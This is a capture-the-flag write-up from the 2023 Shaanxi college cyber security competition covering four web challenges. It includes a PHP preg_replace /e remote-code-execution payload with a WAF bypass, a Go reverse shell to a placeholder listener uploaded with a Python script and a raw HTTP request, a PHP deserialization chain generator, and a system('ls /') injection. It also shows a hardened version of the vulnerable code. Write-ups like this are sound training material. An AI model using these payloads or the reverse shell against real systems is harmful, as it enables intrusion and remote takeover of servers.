WriteUp - 2023 Shaanxi Provincial College Students Cyber Security Skills Competition (2023陕西省大学生网络安全技能大赛)

WEB

0x01 Web – ezrce

Challenge

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>钥匙呢?</title>
</head>
<body>
<!--
   admin的钥匙被他的机器人抢走了!   ("admin's key was stolen by his robot!")
-->
<form action="" method="post" name="name">
    you name:<input name="name" type="text" value="" />
    <input type="submit" value="submit" />
    <br/>
</form>
<form action="" method="get" name="key">
    your key:<input name="key" type="text" value="" />
    <input type="submit" value="submit" />
    <br/>
</form>



<?php
error_reporting(0);
include 'waf.php';
header("Content-Type:text/html;charset=utf-8");
echo "你是谁啊哥们?把钥匙给我!!!!<br/>";   // "Who are you, buddy? Give me the key!!!!"
$key=$_GET['key'];
$name=$_POST['name'];
$qaq=waf($_POST['qaq']);             // only qaq goes through the WAF; name does not
if (isset($_GET['key'])){
  highlight_file(__FILE__);          // any ?key= value dumps this source
}
if (isset($name))
{
    echo "你是".$name."大人????<br/>";                 // "So you are Lord <name>????"
    $name1=preg_replace('/hahaha/e',$qaq,$name);      // /e: $qaq is eval()'d for every match of hahaha
    echo "骗我的吧,你明明是    >>>>小小".$name1;       // "You're lying, you're clearly >>>>little <name1>"
}
?>

The key line is $name1=preg_replace('/hahaha/e',$qaq,$name); The /e modifier makes preg_replace() eval() the replacement string, here the attacker-controlled $qaq, once for every match of hahaha in $name, so any PHP expression that survives waf() is executed. /e was deprecated in PHP 5.5 and removed in 7.0, so the target must be running PHP 5.

The exploit needs two POST parameters: name (must contain hahaha so the pattern matches) and qaq (the expression to evaluate). The GET parameter key only triggers highlight_file() to show this source; it is not needed for the RCE itself.

Main reference: https://www.freebuf.com/articles/system/242482.html

The article covers this in detail. The idea is to read a random file with array_rand(): scandir() lists a directory, array_flip() turns the filenames into array keys, array_rand() picks one of those keys at random, and readfile() prints it. The whole expression contains no string literal, so there is nothing for a quote- or slash-based filter to match.

  1. first payload: name=hahaha&qaq=readfile(array_rand(array_flip(scandir(getcwd()))));

After a few tries this read the contents of waf.php. Only the tail of the file was captured on the page (the beginning of the regex is missing):

  |\/|\?|\\\\/i", $poc)){ echo "hacker! you die!
  "; return "666"; } return $poc; } 骗我的吧,你明明是 >>>>小小300

The visible alternatives reject "/", "?" and a literal backslash (case-insensitively), and on a match waf() prints "hacker! you die!" and returns "666" instead of the input. The trailing 300 is not part of waf.php: readfile() returns the number of bytes it wrote, and that return value became the replacement text echoed after "小小" ("little").

Modify the original payload: three nested dirname() calls walk from the web root (for example /var/www/html) up to the root directory, chdir() moves there, and array_rand() again picks a random file to read. The detail that makes this work is that chdir() returns bool(true), which stringifies to "1", and dirname("1") is ".", so scandir(dirname(chdir(...))) lists the new working directory without ever writing a slash, which the WAF rejects.

  1. final payload :
    name=hahaha&qaq=readfile(array_rand(array_flip(scandir(dirname(chdir(dirname(dirname(dirname(getcwd())))))))))

Since the file is chosen at random, just resubmit a few times until the flag comes out.
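As an added example (not code from the writeup or the challenge), the /e sink is shown next to its hardened form, together with the string-literal-free directory listing the payload relies on. The vulnerable branch only executes on PHP < 7.0, where /e still exists; the hardened branch runs on any version. The inputs $name and $qaq and the directory passed to the listing helper are invented for the demo.

```php
<?php
// Added example, not from the original writeup: the /e modifier beside its
// hardened replacement, plus the literal-free directory listing primitive.

// Vulnerable: with /e, preg_replace() eval()s $replacement (after back-reference
// substitution) once per match. The modifier exists only on PHP < 7.0.
function vulnerable_replace($pattern, $replacement, $subject)
{
    return preg_replace($pattern . 'e', $replacement, $subject);
}

// Hardened: preg_replace_callback() runs a fixed closure; the user-supplied
// $replacement is inserted as data and is never parsed as code.
function hardened_replace($pattern, $replacement, $subject)
{
    return preg_replace_callback($pattern, function ($m) use ($replacement) {
        return $replacement;
    }, $subject);
}

// chdir() returns bool(true), which casts to the string "1"; dirname("1") is ".",
// so this lists $dir with no quote, dot or slash anywhere in the expression.
function list_dir_without_literals($dir)
{
    return scandir(dirname(chdir($dir)));
}

$name = 'hahaha';                      // subject: must contain the pattern (made-up input)
$qaq  = 'strtoupper(php_uname())';     // attacker-chosen "replacement" (made-up input)

if (PHP_VERSION_ID < 70000) {
    // On PHP 5 this prints the uppercase uname string: the expression was executed.
    echo "[/e]       ", vulnerable_replace('/hahaha/', $qaq, $name), "\n";
} else {
    echo "[/e]       modifier removed in PHP 7.0; vulnerable branch skipped\n";
}

// Prints the literal text strtoupper(php_uname()) on every PHP version.
echo "[callback] ", hardened_replace('/hahaha/', $qaq, $name), "\n";

// Lists the parent of the current directory. The writeup's payload nests three
// dirname() calls to reach "/" from a web root such as /var/www/html.
print_r(list_dir_without_literals(dirname(getcwd())));
```

Run it once under PHP 5.x and once under PHP 7+ to see the first line flip from command output to the "skipped" message, while the callback line stays the same on both.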


0x02 WEB - test

Viewing the page source reveals the route /profile/index; visiting it returns a result. Trying /profile/admin instead returns an MD5 hash, which cracks to asdfgh123. Logging in as admin with that password, the page says that an uploaded .go file will be run, so build an upload request carrying the following Go file (a bash reverse shell; replace ip/port with your listener's address):

package main

import (
  "fmt"
  "log"
  "os/exec"
)

func main() {
  // bash reverse shell: stdin/stdout/stderr go to the /dev/tcp listener.
  // Replace ip/port with the attacker's listener before uploading.
  cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/ip/port 0>&1")
  out, err := cmd.CombinedOutput()
  if err != nil {
    fmt.Printf("combined out:\n%s\n", string(out))
    log.Fatalf("cmd.Run() failed with %s\n", err)
  }
  fmt.Printf("combined out:\n%s\n", string(out))
}

Upload script:

import requests

url = 'http://1a059500.clsadp.com/Adm1nUp104d'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36',
    'Referer': 'http://1a059500.clsadp.com/'
}
file_path = r'file.go'

with open(file_path, 'rb') as file:
    file_data = file.read()

# The Go source is the multipart "file" part; the submit button is an ordinary form field.
files = {
    'file': ('123.go', file_data, 'application/octet-stream'),
}
data = {
    'submit': 'submit_file',
}

response = requests.post(url, headers=headers, files=files, data=data)

print(response.text)

The resulting upload request:

POST /Adm1nUp104d HTTP/1.1
Host: 8e50756d.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://8e50756d.clsadp.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydX4dGEAJZUS6ZqkT
Connection: close

------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="file"; filename="123.go"
Content-Type: application/octet-stream

package main

import (
  "fmt"
  "log"
  "os/exec"
)

func main() {
  cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/ip/port 0>&1")
  out, err := cmd.CombinedOutput()
  if err != nil {
    fmt.Printf("combined out:\n%s\n", string(out))
    log.Fatalf("cmd.Run() failed with %s\n", err)
  }
  fmt.Printf("combined out:\n%s\n", string(out))
}
------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="submit"

submit_file
------WebKitFormBoundarydX4dGEAJZUS6ZqkT--

0x03 WEB-pop

EXP (the classes below are property-only copies of the challenge classes; serialize() records only property names and values, so the magic methods that fire the chain on the target are not needed here):

<?php
highlight_file(__FILE__);
error_reporting(E_ALL);
ini_set('display_errors', 1);

class night
{
    public $night;
}

class day
{
    public $day;
}

class light
{
    public $light;
}

class dark
{
    public $dark;
}

// Chain: night -> day -> dark -> light -> day -> dark, ending in the command to run.
$a = new night();
$a -> night = new day();
$a -> night -> day = new dark();
$a -> night -> day -> dark = new light();
$a -> night -> day -> dark -> light = new day();
$a -> night -> day -> dark -> light -> day = new dark();
$a -> night -> day -> dark -> light -> day -> dark = 'ls';

echo urlencode(serialize($a))."\n";

// The challenge's parameter name is "快给我传参pop" ("hurry up and pass me the
// parameter pop") wrapped in invisible Unicode bidi control characters, so it
// has to be URL-encoded before it can be sent as a query-string key.
$un = '‮⁦快给我传参⁩⁦pop';
echo urlencode($un);
?>



0x04 WEB - unserialize

Pass the command straight in as the parameter: ?a=system("ls /")
